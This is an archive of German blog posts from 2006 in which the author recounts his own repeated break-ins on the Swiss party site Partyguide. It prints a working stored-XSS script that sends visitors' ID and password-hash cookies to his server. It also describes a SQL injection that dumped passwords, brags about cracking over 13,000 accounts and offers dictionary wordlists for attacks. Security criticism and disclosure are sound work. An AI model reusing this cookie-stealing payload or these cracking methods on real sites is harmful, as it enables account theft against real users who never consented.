Obwohl Partyguide auch dieses Mal seinen Benutzern nichts über die Sicherheitslücke und die mögliche Kompromittierung ihrer Passwörter erzählt hat (bisher jedenfalls), äusserte man indirekt Kenntnis über die Attacke, als man meine Passwort-Datenbank mit einer DDoS-ähnlichen Attacke zuspammen wollte. Das ist natürlich auch eine Art, auf solche Hacks zu reagieren - und eine sehr professionelle dazu:
Deshalb entschieden wir uns, dein Skript ein paar Tausend mal mit gefakten Daten aufzurufen. [...] Ob die ganze Aktion erfolgreich verlaufen ist, können wir natürlich nicht sagen.
Quelle: Kommentar von Oli (seines Zeichen Partyguide-Partisan und einer der Argonauten)
Zwei Hinweise von meiner Seite - den Rest kann man sich selber zusammenreimen:
- Ich verwende INSERT IGNORE in meinem MySQL-Query. Primary Key ist die Benutzer-ID.
- Meine MySQL-Datenbanken werden jede Nacht mit mysqlhotcopy gebackupt.
Bloatware
Als diesmalige Schwachstelle empfahl sich die kürzlich eingeführte Blog-Funktion (Ein einig Volk von Bloggern (Partyguide 1, eBay 1) und Partyguide und seine Blogs).
Mit dem "Wir-auch"-Ansatz hat man sich aber ein Ei gelegt. Die Parallelen zu Microsoft erstaunen den Kenner kaum: Deren Produkte zeichnen sich als Bloatware aus - bei jedem neuen Release stehen unzählige neue Funktionen im Vordergrund, der Qualitätssicherung und Sicherheit zollt man - wenn überhaupt - nur beiläufig Respekt.
Microsoft hat mit dem Wurm-Debakeln ab 2001 ernsthafte Konsequenzen aus diesem fragwürdigen Verhalten gezogen; Service Pack 2 für Windows XP war das markanteste Anzeichen für den eingetretenen Sinneswandel. Seit diesem glorreichen Tag heisst es auch in Redmond: Security first. Wann folgt auch Partyguide endlich diesem Motto?
Partyguide war sich für diesen Schritt bisher aber zu Schade. Dabei haben den Betreibern über 200'000 Benutzer persönliche Angaben wie Vornamen, Nachnamen, Adresse, Geburtsdatum, Telefonnummer, E-Mail-Adresse anvertraut ...
Man verfolgt bei der Bekämpfung von Sicherheitslücken den erfolgsversprechenden Ansatz, potentielle Hacker mundtot zu machen. Anstelle das man die Probleme ein für allemal beseitigt (mein Vorschlag: Code-Audit - aber nicht durch die längst disqualifizierten stümperhaften Programmierer, sondern durch Profis), köpft man lieber den Überbringer der schlechten Nachricht.
Funktionsweise des Exploits
Die Leser werden sich nun fragen, wie dieser vierte Hack (Nummer drei war bisher der spektakulärste - sowohl im Umfang wie auch bezüglich Peinlichkeit) zu stande kam ...
Nach den erstaunlichen Cookie-Tricklein, auf die mich ein anonymer Tippgeber aufmerksam machte, kam die XSS-Attacke (ohne Exploit) von Dritten, um danach mir erneut die Chance zu geben, mittels SQL-Injection die Datenbank auf im Klartext gespeicherte Passwörter "abzugrasen".
Nummer Vier wiederum kam durch einen Initialhinweis durch Dritte zu Stande - dieses Mal handelt es sich um eine ganz klassische eine JavaScript-Injection. Alte Schule, nichts bahnbrechends Neues, seit Jahren bekannt. Wohl nur nicht auf der Argo (paradox: Argo bedeutet auf Griechisch "die Schnelle") ...
Ziel des Angriffs war die bereits erwähnte Blog-Funktion. Diese wurde eingeführt, weil ein findiger Kopf auf dem Schiffchen die glänzende Idee gehabt hatte, auf den momentanen Blog-Hype aufzuspringen.
Ganz nebenbei: Ehrlich gesagt würde ich lieber ein Corporate Blog begrüssen - Titel "Jason und die Party-Argonauten", in dem wir offizielle Statements zu aktuellen Problemen/Neuerungen nachlesen können. Dauert wohl noch etwas länger.
Und noch einmal nebenbei: Man kann sich überhaupt fragen, ob man dieser Funktion überhaupt den Beinamen "Blog" geben darf - oder nicht eher: Aufgebohrte Kommentarfunktion? Egal. Der registrierte User kann also der ganzen Welt mitteilen, was Belangloses gerade in seinem Leben abläuft. Und das natürlich nicht nur in Form von Plain-Text, sondern auch mit Textauszeichnunge (Schriften, Farben, Textgrössen, Textauszeichnugne) - realisiert durch HTML-Code. Spätestens hier sollten die Alarmglocken eines sicherheitsbewussten Entwicklers schrillen.
Nun war es so, dass man sich für einen WYSIWYG-HTML-Editor entschied. Die Wahl der Entwickler fiel auf FCKeditor, den ich selbst in einigen Web-Projekten auch einsetze. Daran ist nichts auszusetzen. Was ich erst später entdeckte: Lustigerweise wird aber dieser Editor in Safari, meinem Browser der Wahl, nicht geladen (FCKeditor wäre eigentlich Safari-kompatibel). Ich konnte Artikel also in Plain-Text eingeben, war mir diesem Unterscheid gegenüber den anderen Usern vorerst aber nicht bewusst.
Der Hinweis, der den Ansatz für diesen Exploit lieferte, wurde mir durch einen anonymen Tippgeber zugestellt. Die Person hatte entdeckt, dass man in das Titelfeld JavaScript-Befehle eingeben konnte, die nicht ausgefiltert wurden (bspw. mit der netten PHP-Funktion htmlentities()). Mein Ehrgeiz war auf alle Fälle geweckt.
Nach einer kurzen Überprüfung des Sachverhaltes begann ich, den JavaScript-Exploit zu coden. Ziel: Durch den zweiten Hack angeregt die Cookie-Daten des Lesers des Blogs auszulesen und diese an ein Script auf einem meiner Server weiterzuleiten.
Die Limitation der Zeichen im Titelfeld war sehr mühsam und ich brachte den gewünschten Code nicht im verfügbaren Platz unter. Ich wollte bereits aufgeben, als ich als letzter, verzweifelter Versuch den Code in die textarea, das eigentliche Feld für den Inhalt des Artikels, eingab. Ich konnte mir zu diesem Zeitpunkt überhaupt nicht vorstellen, dass jemand so blöd wäre, JavaScript-Befehle in diesem Feld ungefiltert entgegenzunehmen, in der DB abzuspeichern und danach wieder ohne Behandlung kritischer HTML-Befehle auszugeben. Denkste!
Folgender Code wurde ohne zu murren gefressen:
<script>
d=document;c=d.cookie;
exp=/c_id=([0-9]{1,6})/;id=exp.exec(c);
exp=/c_psw=([a-zA-Z0-9]{32})/;pw=exp.exec(c);
if(id[1] && pw[1]) {
d.write('<iframe width=\'0\' height=\'0\' src=\'http://p.mad4you.homeip.net/b.gif?i='+id[1]+'&p='+pw[1]+'\'></iframe>');
}
</script>
und füllte fortan meine Datenbank.
Soweit ich es erkennen kann, übernimmt eine Funktion des FCKeditors das Ausfiltern unerlaubter Tags. Da diese Applikation aber Client-seitig läuft, ist es lächerlich, sich ausschliesslich darauf zu verlassen! Man tat es - wohl aus einer Kurzschlussreaktion heraus - trotzdem.
Schade nur, dass die Frequenz der Übermittlungen deutlich abnahm, sobald mein Artikel auf Grund der Veröffentlichungszeit die Titelseite verliess. Ich griff zu dem umständlichen Trick, den Artikel von Zeit zu Zeit neu zu speichern, denn dann wurde das Veröffentlichungsdatum automatisch angepasst und der Artikel fand wieder den Weg auf die Titelseite.
Die Zielpersonen für diesen Angriff waren zweifach eingeschränkt: Einerseits mussten die Personen die Autologin-Funktion aktiviert haben, denn sonst wird keine User-ID und der Passwort-MD5-Hash (die Verwendung eines Hashes wurde durch mich angeregt - vorher Plain-Text) im Cookie gespeichert. Andererseits mussten die Personen auch aktiv die Blog-Seite ansurfen. Alles in allem ein sehr unergiebiger Prozess - aber dennoch spassig (halt, nein, es handelt sich um eine sehr ernste Sache, mögen PG-Jünger rufen - Gegenfrage: Wenn es so ernst ist, wieso sind die "ernsten" Daten so lächerlich gesichert?!).
Findings
Nicht, dass diese Regeln neu wären, doch bei den Partyguide-Entwicklern ist die Meldung wohl noch nicht bis zum Grosshirn durchgekommen:
- Traue nie GPC-Daten! (GPC = GET/POST/Cookie)
- Validiere Eingaben niemals Client-seitig, sondern auf dem Server
- Teste Scripts
- Teste Scripts nicht mit denjenigen Daten, die du als Programmierer erwartest
- Teste Web-Sites auf den wichtigsten Browsern (MSIE, Mozilla/Firefox, Opera, Safari/KHTML)
Evil
Bin ich nun ein Böser, weil ich a) aktiv oder durch Hinweise nach Exploits suche und b) dann auch hinterhältig Passwort-Daten sammle? Und all dies, ohne Partyguide innert Minuten nach der Entdeckung der Sicherheit benachrichtige? Oli findet es:
Jedoch mussten wir wieder einmal mehr feststellen, mit welchen bösartigen Absichten du pg gegenüber stehst. [...] Im letzten Monat bist Du aber definitiv zu weit gegangen. Deine Böswilligkeit kommt immer mehr zum Vorschein.
May I introduce: The Antichrist himself! Von Nostradamus seit Jahrhunderten vorausgesagt, nun endlich wandelt er im Körper von Mario Aeby auf Gottes Erde ...
Kollege Burgdorfer amüsierte sich ab dieser Aussage: Wenn das Böse sei, was ich bisher gemacht hätte, hat Oli ein komisches Verständnis von Bösheiten ...
Spass bei Seite: Sicherlich ist mein Vorgehen nicht dasjenige eines professionellen Security-Experten. Aber für mich waren die letzten zwei Hacks eben auch ein Test, der aufzeigen sollte, ob die Betreiber der Community-Site ihre Applikation entsprechend aufmerksam überwachen. Beim letzten Hack dauerte die Reaktionszeit satte 7 Tage, obwohl eine Betrachtung der Log-Daten schon am ersten Tag meiner Attacke auffällige Angaben enthielt.
Der vierte Hack wurde nur entdeckt, weil Partyguide von einem Dritten darauf aufmerksam gemacht wurde. Man stelle sich vor, ich hätte bis in den Herbst hinein weiter auf Partyguide "gebloggt" ...
Auch der CEO tappt in die Falle
Ist er nicht süss: Schon am zweiten Tag meiner Sammelaktion fand sich in der Datenbank einen Eintrag mit der Benutzer-ID '1' ...
Labels: Partyguide, Windows
Samstag, Juli 08, 2006
Partyguide Strikes Back
Gestern Donnerstag, kurz nach Mitternacht, muss es Jason und den Argonauten endgültig den Nuggi rausgejagt haben. Wenige Tage vor dem siebenjährigen Geburtstag der (in den letzten sechs Monaten wohl am häufigsten gehacktenTM) schweizerischen Party-Community blies man nun zum Gegenschlag gegen den so verhassten think eMeidi.
Die Verantwortlichen entdeckten - ob durch Hinweis eines Dritten Mitstreiters sei dahingestellt - meine Arbeiten am vierten Partyguide-Hack (JavaScript-Injection, später dazu mehr - dank an Anonymous für den ursprünglichen Tipp).
Nach stundenlangen Beratungen im Tipi des Häuptling Jasons kamen die geistreichen Argonauten zum Schluss, mit geballter Feuerkraft zurückzuschiessen. Für was verfügt man denn über genug Bandbreite und eine Vielzahl an Servern (zum Teil gar durch Gönner mitfinanziert)?
So wurde mein Debian-Server kurz nach 00:00 Uhr Ziel einer stümperhaften DoS-Attacke, die erst heute Nachmittag kurz vor 16:00 Uhr abbrach. Wie man es den beiden cacti-Graphen ansieht, äusserten sich die geballten Aufrufe meines Scriptleins, das Usernamen und Passwort-Hashes (aus dem Cookie) in Empfang nahm, sowohl in einem konstanten ein- und ausgehenden Traffic auf eth0 sowie einer stark erhöhten Load Average auf meiner schmalbrüstigen Pentium III-CPU (600MHz).
Fazit
Ein access.log, das fünfmal so schwer wiegt wie sonst:
ALPHA:/var/log/apache2# ls -l total 44808 -rw-r--r-- 1 root adm 29612337 2006-07-08 01:01 access.log -rw-r--r-- 1 root adm 5789490 2006-07-02 06:24 access.log.1
... und uns auch noch etwas über die Technik von Partyguide erzählt:
217.150.245.77 - - [07/Jul/2006:15:50:27 +0200] "GET /b.gif?i=84455&p=ab5c62bbb11b644fdcecd91e89acd768 HTTP/1.1" 302 - "-" "curl/7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.6m zlib/1.2.2"
... sowie auch die IP des mutmasslichen "Täters" freigibt:
84.72.129.186 - - [07/Jul/2006:00:06:25 +0200] "GET /b.gif?i=100&p=1234 HTTP/1.1" 302 20 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4" 217.150.245.77 - - [07/Jul/2006:00:29:04 +0200] "GET /b.gif?i=196828 HTTP/1.1" 302 700 "-" "curl/7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.6m zlib/1.2.2" 84.72.129.186 - - [07/Jul/2006:00:30:05 +0200] "GET /b.gif HTTP/1.1" 302 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4" 84.72.129.186 - - [07/Jul/2006:00:30:24 +0200] "GET /b.gif?i=196828 HTTP/1.1" 302 218 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
Eine MySQL-Tabelle mit knapp 110'000 Records, die allesamt vom Partyguide-Server aus kamen:
mysql> SELECT COUNT( * ) FROM `xss` WHERE ip = '217.150.245.77'; +------------+ | COUNT( * ) | +------------+ | 109342 | +------------+ 1 row in set (0.47 sec)
Und nicht zuletzt ein Beweis, wie robust Debian Linux mit Apache 2.0.55, PHP 4.4.2 und MySQL 4.1.15 ist.
Fehler von meiner Seite
Das nächste Mal schalte ich E_ALL in solch sensitiven Verzeichnissen wieder aus:
[Fri Jul 07 00:29:04 2006] [error] [client 217.150.245.77] PHP Notice: Undefined index: p in /var/www/pg-search/xss.php on line 12
Leider Gottes ein zu guter Ansatzpunkt für potentielle PG-Hacker ...
Zu guter Letzt noch dies ...
Es tut mir wirklich leid, das sagen zu müssen: Anstelle eure Energie an einem kleinen Fisch wie mir zu verschwenden, unterzieht ihr all eure PHP-Scripts einmal einem richtig gründlichen Security-Audit.
Labels: Linux, Partyguide
Sonntag, Juni 18, 2006
Wahlistar ...
... did it!
Die Italiener didn't it, die Amis auch nicht, aber immerhin did it der Referee, der mehrmals wortwörtlich Rot sah.
Und das einzige was ich an diesem Abend "did" war ...
- ... zum ersten Mal Wachs in meine Haare zu schmieren (schien Wirkung zu zeigen)
- ... 60 SFr. in Alkohol zu investieren (immerhin zur Happy Hour im Eclipse) und die Crew damit abzufüllen
- ... einen neuen Schuppen namens Cuba (beim Kornhausplatz) zu betreten und mich auf den ersten Blick in einer Terrorzelle von Al-Qaida zu wähnen, danach aber doch genussvoll der lateinamerikanischen Musik zu frönen (*sing* "Como se llama, bonita, mi casa, su casa ...")
- ... um schlussendlich in Wahlis BMW Richtung Sonnenaufgang zu düsen (okey, da ich zugegebenermassen das dritte Rad am Wagen war, endete der Ausflug für mich bereits im Breitsch bei meiner Schlafgelegenheit aka. Hotel Mama).
Labels: Partyguide
Montag, Juni 12, 2006
Partyguide auf den Spuren von Flirtlife.de
Wie der heute erschienen c't zu entnehmen ist, scheint sich mein Partyguide-Hack in wunderbarer Koinzidenz mit einem anderen Hack ereignet zu haben:
Auf der Sicherheitsmailingliste Full Disclosure [Erläuterung des Begriffes] wurde eine Liste mit Zugangsdaten von rund 100 000 Nutzern der Internet-Dating-Website Flirtlife.de veröffentlicht.
Schade, schade ...
Der Betreiber reagierte am Folgetag mit der Sperrung sämtlicher Accounts; rund 200 000 Turteltäubchen mussten sich ein neues Passwort setzen.
Betreiber kommen selbstverständlich deutlich stärker unter Druck, rasch und richtig zu reagieren, wenn die Passwörter ohne Vorwarnzeit veröffentlicht werden. In meinem Fall war es so, dass ich die Passwörter erst veröffentlicht habe, als a) die Sicherheitslücke von Betreiber geschlossen worden war und b) die Passwörter mit den kompromittierten Accounts nicht mehr funktionerten.
Im Gegensatz zu den Schlampereien bei Partyguide hielten sich die Entwickler von Flirtline.de an gängige Praktiken zum Schutz der Passwörter:
Dies stützt Kopolts Aussage, dass die Passwörter nicht von Flirtlife stammen können, weil dort Passwörter nicht im Klartext, sondern als MD5-Hashes gespeichert werden.
Quelle: c't, Nr. 13, 12.06.2006, "Flirt-Passwörter", S. 64.
Dasselbe habe ich im Nachgang den Betreibern von Partyguide empfohlen.
Was Flirtlife.de nicht sagt: Vielleicht war Jason (und seine Entwickler-Argonauten) dort als externe Developer beschäftigt und speicherten - wie lange Zeit bei Partyguide - die Passwörter im Klartext in Cookies ab?
Im Artikel wird vermutet, dass die Passwörter durch "Mitschneiden des Netzwerkverkehrs" ergattert wurden. Hier müssen wir auf die Load-Balancer von Partyguide & Co. vertrauen. Denn dort sammelt sich der Netzverkehr schlussendlich und wäre am leichtesten abzugreifen.
Häufige Passwörter
Erstaunlich, wie ähnlich sich die Passwortlisten (Flirtlife-Passwörter: vgl. Scan des Artikels) der beiden Hacks sehen. Die Internet-Benutzerschaft scheint ein Faible für Passwörter zu haben, die mit 1234 beginnen oder hallo, ficken (das Partyguide-äquivalent: arschloch) oder passwort enthalten.
Ich hoffe schwer, dass die schweizerischen Party-Communities bereits Ende letzter Woche alles unternommen haben, um die tausenden privaten Datensätze von Benutzern weiter abzusichern. Ich bin mir nicht sicher, ob die Ableger der Generation Fun & Party die Verantwortung endlich für ihr Tun übernehmen möchten und wollen (ich warte schon gespannt auf Kommentator martin, der mich auffordert, die Verantwortung für mein Tun zu übernehmen und mich selbst wegen Datendiebstahl der übelsten Sorte anzuzeigen). Wie wäre es mit einer ISO-Zertifizierung? Für den Prüfbericht von Partyguide würde ich garantiert eine gewisse Summe hinblättern.
Wer Zeit und Lust hat (nein, diesmal nicht ich, da ich eher auf solch obereinfache Mini-Hacks stehe wie bei Partyguide *grins*), startet eine Brute-Force-Dictionary-Attack (alle Passwörter mit einem bestimmten Account durchtesten) mit den auf Full Disclosure und hier für Partyguide veröffentlichten Passwörtern.
Die Anbieter täten also gut daran, schleunigst Black-Lists verbotener Passwörter einzusetzen. Im gleichen Zug könnte man so auch hunderte, ja gar tausende nicht mehr genutzter Account löschen (laut einem anonymen Informanten ist Partyguide andererseits sehr stolz über seine über 200'000 User, auch wenn die Hälfte davon wohl gefaket ist - davon möchte man sich nicht gerne trennen).
Fazit
Partyguide dämmert es hoffentlich endlich, dass es intelligenter wäre, den gesamte Spaghetti-Code einem Security-Audit zu unterziehen, anstelle dauernd neue Features, die die Welt nicht braucht, aufzuschalten (nette Kritik der Blog-Funktion drüben bei Onkel Tom - FULL ACK).
Bisher erschienen ...
Alle Blog-Beiträge, die Partyguide im Titel enthalten
0.5x Dank: Kollege Liechti, der vom Flirtlife-Hack wusste, aber dem der Name der Site partout nicht mehr einfallen wollte.
Nachtrag
Mittlerweile habe ich auch den Online-Artikel auf Heise gefunden:
Passwortdaten von Flirtlife.de kompromittiert
Spannend ist u.a. die Diskussion im Forum:
... sowie auch in einem anderen Forum, in dem sich jemand frägt, ob es legal ist, die Liste der Passwörter herunterzuladen:
Die Parallelen sind in beiden Fällen hier nicht von der Hand zu weisen. Im Heise-Forum schlagen sich die meisten Teilnehmer aber glücklicherweise nicht auf die Seite des fahrlässigen Anbieters ...
Und die Vermutung dieses Forum-Teilnehmers erweist sich - zumindest für Partyguide - als richtig:
select * from users where password like md5(username)
Und hiermit kickte sich der Anbieter von flirtlife.de definitiv in die Partyguide-Liga:
ein Datenbank-Kennwort der Datenbank war lange einsehbar
Der Klassiker schlechthin:
Labels: Partyguide
Sonntag, Juni 11, 2006
Partyguide reagiert ... ein Wenig.
Ein semi-offizielles Statement der Partyguide-Jünger auf die kürzlich entdeckte Sicherheitslücke findet sich in deren Forum (danke Francine, dass du dieses Thema erwähnst):
Ihr braucht euch natürlich keine Sorgen zu machen! Wir haben lediglich den Sicherheitsstandard grobfahrlässiger Passwörter nach oben korrigiert! Dies betraf folgende Passwörter welche aus nicht mindestens 8 Zeichen sowie Zahl und Buchstabe bestanden. Zum Teil gab es Accounts mit fahrlässigen Passwörtern, wie Nickname oder Geb. Datum um nur einige Beispiele zu nennen. Diese sind jetzt aber aus der Welt geschafft. Neu ist es auch nicht mehr möglich, ein unsicheres Passwort überhaupt erst zu erstellen. Daher ein Dankeschön an unsere Entwickler, welche dank Technik nun auch die Schwäche des Menschen sicher machen. Dieser Satz kommt ja nicht von ungefähr, Ihr wisst es ja alle! Maschinen lassen sich nicht Täuschen nur die Menschen, welche Sie Bedienen! Und jetzt kann man Sie ja nicht mehr falsch Bedienen.... ;-)
Quelle: Passwort ändern
Ach, was seid ihr nicht für liebe Menschen ... Komisch nur, dass ich gestern Abend einen Account mit dem Passwort 123456 erstellen konnte?
Insbesondere "Daher ein Dankeschön an unsere Entwickler, welche dank Technik nun auch die Schwäche des Menschen sicher machen." finde ich unpassend - gerade diese Pfeifen haben euch Usern den Schlammassel in der Tat eingebrockt ...
Labels: Partyguide
Samstag, Juni 10, 2006
Häufige Passwörter
Im Nachgang zu dem gestern veröffentlichten Artikel über den dritten Partyguide-Hack möchte ich hier - nach wissenschaftlicher Manier - noch einige "Findings" veröffentlichen. Auf prägnante Art und Weise, damit Entscheider ähnlicher Community-Sites ihre eigenen getroffenen Massnahmen mit meinen Empfehlungen vergleichen können:
- Datenbank: Passwörter sollten von den Benutzerdaten getrennt in einer anderen Tabelle gespeichert werden. In diesem Falle hätte ich auch mit meiner "soften" SQL Injection kein Zugriff auf dieses Feld gehabt. Zudem sollten sie nicht im Klartext abgelegt werden (MD5-Hash oder ähnliches Verfahren). Der Vorteil eines Hashes ist ausserdem, dass die Gross-/Kleinschreibung beachtet wird. Gemäss dem im letzten Artikel publizierten Mail scheint auf Partyguide endlich auch ein Hash zum Einsatz zu kommen:
Nachteil: Vergisst ein User sein Passwort, kann er sich dieses nicht zusenden lassen."Bitte beachte die Gross- und Kleinschreibung"
- Statistiken: Obwohl bei solchen grossen Communities riesige access.log-Dateien anfallen, sollten diese zwingend im Auge behalten werden. Es hätte den Verantwortlichen viel früher auffallen sollen, dass ein Script im Vergleich zu den Vorwochen deutlich häufiger aufgerufen wird (und das auch noch in der späten Nacht). Die Log-Dateien sind gross, doch es müssten auf dem Markt Produkte existieren, die nichtssagende Informationen aus Log-Dateien ausfiltern können und Alarm schlagen, sobald sich verdächtige Ereignisse - wie deutlich gesteigerte Zugriffe auf bestimmte URLs - häufen.
- Passwörter: Ein Programmierer, der es erlaubt, dass Benutzer seines Produkts als Passwort den Benutzernamen verwenden, gehört geteert und gefedert. Bei Partyguide konnte ich über 500 solcher Accounts dingfest machen, bei denen Usernamen und Passwort übereinstimmten.
Weiter war es möglich, dass man ein Passwort bestehend aus einem Zeichen setzen konnte. Zwar wurde man beim Login (?) darauf hingewiesen, dass das Passwort unsicher sei und mindestens 6 Zeichen und eine Zahl enthalten sollte, doch Konsequenzen folgten keine.
Ausserdem sollte eine Blacklist an verbotenen Passwörtern beigezogen werden (s. unten). Programmierung: All diese Sicherheitsmassnahmen nützen nichts, wenn es den Programmiern eklatant an Sicherheitsbewusstsein mangelt. Nie, nie, nie sollte man GET/POST-Daten blind trauen. In diesem Fall war es so, dass der Programmierer von der irrigen Annahme davon ausging, das alles, was über GET/POST hereinkam, "clean" war. Gerade das Gegenteil sollte aber angenommen werden: Böse Jungs wird es immer geben. Anstelle also die GET-Variablen mit einer foreach()-Schleife durchzuspulen und blindlings in ein SQL-Query einzubauen (Ironie des Schicksals: immerhin mysql_escape_string scheint man zu benutzen), definiert der Programmierer und nicht der HTTP Request, was in die SQL Query hinenkommt und was nicht. Inklusive einer Plausibilitätsprüfung.
Weiter finde ich es auch nicht sinnvoll, SQL-Fehler an den Endbenutzer auszugeben. Dies half mir sehr, die Funktionsweise des Scripts zu verstehen:
SELECT m.member_id,m.login,m.anrede,m.land,m.ort,m.kanton,m.land, m.geburtsdatum_sichtbar, FLOOR((TO_DAYS(NOW()) - TO_DAYS(CONCAT(geburtsdatum_jahr, - , LPAD(geburtsdatum_monat, 2, 0 ), - , LPAD(geburtsdatum_tag, 2, 0 )))) / 365) as member_alter, p.nr as hat_foto FROM members AS m LEFT JOIN members_pictures_upload AS p ON m.member_id = p.member_id AND p.nr = 1 WHERE m.search = Array ORDER BY login LIMIT 0,500
Nebenbei: Kennt man bei Partyguide den Feldtyp DATE nicht? Oder wieso speichert man Geburtsjahr, -monat und -tag in ein separates Feld?
Häufigste Passwörter ...
... oder was Kennwörter über die durchschnittliche Intelligenz des Benutzers aussagen:
- 123456 (427)
- hallo (76)
- LAKERS (73)
- passwort (53)
- 123456789 (53)
- 12345 (51)
- 1234 (51)
- italia (44)
- hallo1 (43)
- arschloch (43)
Dictionary Attack
Im Netz gibt es eine Menge an Security-Sites, die sich zum Ziel gemacht haben, möglichst viele Passwortdateien bereitzustellen, mit denen Dictionary Attacks ausgeführt werden können. Für Partyguide musste ich natürlich lokale Gegebenheiten adaptieren. Ich stelle die Passwort-Dateien unter folgender URL zur freien Verfügung:
16 Passwort-Listen für Dictionary-Attack
Ob ein Richter hier schon von krimineller Energie sprechen wird? Ich weiss es nicht. Einige Kommentatoren vermuten ja schon, dass die Polizei in Bälde vor meiner Tür steht. Mal schauen.
Links
Nützliche Links:
- Passwörter - Dictionary Attack
- Wortlisten
- Statistiken über das Telefonbuch der Schweiz
- Die beliebtesten Vornamen des Jahres (Wichtig: Nicht die Namen von 2006 wählen, sondern diejenigen, die den Jahrgängen der Benutzer entsprechen)
- Packet Storm - Wordlists
- Die Post - PLZ-Verzeichnis
PS: Ich warte immer noch auf eine offizielle Stellungnahme der Betreiber der Web-Site.
Labels: Partyguide
Samstag, Juni 10, 2006
Der dritte Partyguide-Hack
In der letzten Woche standen 13'787 Accounts auf www.partyguide.ch offen.
Durch einen extrem peinlichen Fehler (für Partyguide nicht das erste Mal) war es jedermann (!) möglich, dank einer manipulierten Anfrage an das AJAX-Benutzer-Such-Script beliebige Felder der MySQL-Tabelle abzufragen, die alle Benutzerdaten enthielt. Neben Vornamen, Nachnamen, Geburtstdatum stand auch das Passwort-Feld jeglichen Anfragen offen.
Dank einer relativ simplen Dictionary-Attack war es mir innert weniger Tage möglich, Passwörter von über 13'000 Accounts freizulegen:
Deshalb erneut die Warnung an alle leichtgläubigen Surfer: Partyguide.ch nimmt es mit dem Datenschutz überhaupt nicht ernst. Besprecht persönliche und private Anliegen NIE über diese kohärent unsichere Plattform. Sie verdient euer Vertrauen nicht, weil sie von einem unfähigen PHP-Programmier entwickelt wurde, der grundlegende Sicherheitsaspekte nicht berücksichtigt hat. Ihm scheint es egal zu sein, wenn unberechtigte Benutzer auf fremde Konten zugreifen können.
Immerhin scheint der Sysadmin meine gesteigerten Anfragen auf das AJAX-Script bemerkt zu haben. Gestern Donnerstag oder heute Freitag lud er dann selbst das .csv-File von meiner Site herunter, änderte das Passwort aller kompromittierter Benutzer und teilte ihnen dies auch mit:
Hallo <username>
Dein Passwort auf PartyGuide.ch wurde aus Sicherheitsgründen geändert und lautet neu:
JasonIsTheBest
Bitte beachte die Gross- und Kleinschreibung. Du kannst es jederzeit ändern unter myPage -> mySettings [ändern?!], bitte achte aber auf die Passwort-Richtlinien. Dein Passwort sollte mindestens 8 Zeichen lang sein und sowohl Buchstaben als auch Zahlen enthalten. Benutze niemals deinen Namen, Geburtsdatum oder dergleichen als Passwort.
Besten Dank & liebe Grüsse PartyGuide.ch Team
Dank dem .csv-File scheint es versierten Nutzern ein leichtes zu sein, zu überprüfen, ob die fahrlässigen Benutzer in Bälde ihr Passwort wieder auf den Standard-Wert zurücksetzen (als ich heute versucht habe, einen Account mit dem Passwort '123456' zu erstellen, hat dies ohne Komplikationen geklappt. Jungs von PG, ihr seid einfach *irre*!).
Natürlich schweigt man sich auf den plötzlichen Wechsel des Passwortes aus. Nein, man informiert die Nutzer nicht, dass ihr gewähltes Passwort, das evtl. auch für den E-Mail-Account verwendet wird, gefährdet ist. Typisch Partyguide. Hauptsache, niemand bekommt vor der konkreten Tragweite etwas mit.
Übrigens: Auch (jetzt unerwähnt gelassene) Konkurrenten schienen bis auf meinen Hinweis ("Hey, wieviele User haben bei euch das Passwort 123456") völlig hemmungslos erlaubt zu haben, unsichere Passwörter zu verwenden. Pfui. Immerhin haben sie vorsorglich reagiert.
Labels: Partyguide
Dienstag, Juni 06, 2006
Ein einig Volk von Bloggern (Partyguide 1, eBay 1)
Da werde ich heute von sichtlich stolzen Partyguide-Staffs unaufhörlich auf die neue aufgeschaltete Blogging-Funktion auf der Community-Web-Site hingewiesen, und dann auch das noch:
Ein weiterer großer Name im Internetgeschäft springt auf den Web-2.0-Zug auf: eBay wird auf seiner Plattform in Kürze offenbar Blogs und auch Wikis integrieren.
Quelle: eBay integriert Blogs und Wikis
Irgendwie ist man heute einfach nicht mehr "cool", wenn man nicht auch noch ein Blog auf seiner Plattform anbietet ... Werfen wir doch alle mit schönen Buzzwords um uns.
Liebe Partyguide-Entwickler, liebe eBayer: Konzentriert euch doch lieber auf eure Kernkompetenzen, statt der microsoftschen Featuritis zu frönen. Wir wissen ja alle, wie es mit Microsoft endete: Nachdem man auch Windows XP wieder mit unzähligen Funktionen vollgepappt (verspätet) auf den Markt warf, kam die Rache der Bloatware: Sicherheitsprobleme en masse. Zumindest einer der beiden neuen Blogging-Dienstleister, die die Welt gerade noch gebraucht hat, kann ein Liedlein davon singen. Und beide sollten sie endlich einmal die Usability ihrer Produkte verbessern ...
Labels: Partyguide, Windows
Dienstag, Juni 06, 2006
Partyguide zensiert Konkurrenz
Da entdecke ich gestern also, dass Partyguide Züge eines totalitären Einparteien-Staates in Asien annimmt, und nun das:
Nicht nur eMeidi fungiert auf der Liste der "banned words", sondern auch tilllate, lautundspitz sowie usgang.ch (usgang kann aus verständlichen Gründen vom Vorsitzenden der allumfassenden Partyguide-Partei nicht zensiert werden).
Immerhin fühle ich mich in sehr, sehr guter Gesellschaft *smile*
PS: Four-Letter-Words werden übrigens als nicht anstössig betrachtet.
Dank: Kollege Saxer
Labels: Partyguide
Montag, Juni 05, 2006
Partyguide zensiert eMeidi
Mit einem weinenden und einem lachenden Auge habe ich soeben zur Kenntnis genommen, dass der Begriff eMeidi in Nachrichten, die über Partyguide verschickt werden, zensiert wird.
Einerseits freue ich mich auf den Eingang in die Liste der "Hall of fame" der "banned words" - andereseits: He Jungs, was soll der Scheiss?
Labels: Partyguide
Sonntag, Juni 04, 2006
Frauen
Nach den von Randy bereits ausführlich dargelegten Ereignissen von gestern Abend (Motto: Da Posse meets Berne City) und kleinen Seitenhieben gegenüber meiner Wenigkeit (tanze ich wirklich sooo schlecht?) wurde die Storie unseres gestrigen Ausfluges heute Sonntag Nachmittag weitergeschrieben.
You've got Mail!
Auf dem Party-Portal meines Vertrauens trudelte unerwartet eine Nachricht einer Dame ein, die mich aufhorchen liess:
hej
du bisch doch geschter im propäuer gsi gäu?
greez
Quelle: Partyguide-Mitteilung von Sime4 an mad4you, 14:56 Uhr
